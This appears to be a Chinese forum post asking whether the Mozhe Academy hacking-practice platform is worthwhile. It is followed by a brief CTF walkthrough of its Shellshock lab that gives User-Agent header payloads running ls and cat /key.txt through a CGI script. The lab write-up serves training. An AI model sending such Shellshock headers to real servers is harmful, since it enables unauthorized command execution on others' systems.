墨者学院这个平台真的能学到技术吗?

Posted 2023-04-30

就是最近有同学推荐墨者学院，说是一个网络攻防平台

墨者学院这样的网站是实战类靶场，适合对攻防技术有兴趣的朋友，也需要懂一点基础知识。这个平台上的靶场我试过，还蛮好的，虚拟环境不会卡，体验感比其他开启虚拟机的好多了。唯一不足的就是题目不是很多，也没有基础知识学习的模块。
坚持学习肯定能学到的，祝你成功。 参考技术A 小伙伴可以来我们网站看看哦，不收取费用的。
能否学到技术得靠自己哦。

[ 墨者学院 ] 命令执行——Bash漏洞分析溯源

0x00.题目描述：

背景介绍

安全工程师"墨者"对一单位业务系统进行授权测试，在测试过程中，发现存在bash命令执行漏洞。

实训目标

1、了解bash；

2、了解Bash远程命令执行漏洞形成原因；

3、了解Bash远程命令执行漏洞利用方法；

解题方向

找到poc.cgi文件

 

0x01.题目分析：

根据题目说明，在网上对Bash远程命令执行漏洞进行了一番学习。

参考连接

freebuf：https://www.freebuf.com/vuls/44994.html

Seebug：https://www.seebug.org/vuldb/ssvid-88877

 

0x02.解题过程

通过网上的资料搜查，发现此漏洞存在的路径多数在网页/cgi-bin/下，结合题目给的提示，打开http://url/cgi-bin/poc.cgi

构造执行语句插入到请求头的User-Agent头里面

User-Agent: ()  :;; echo; /bin/ls /

然后构造执行语句查看key.txt

User-Agent: ()  :;; echo; /bin/cat /key.txt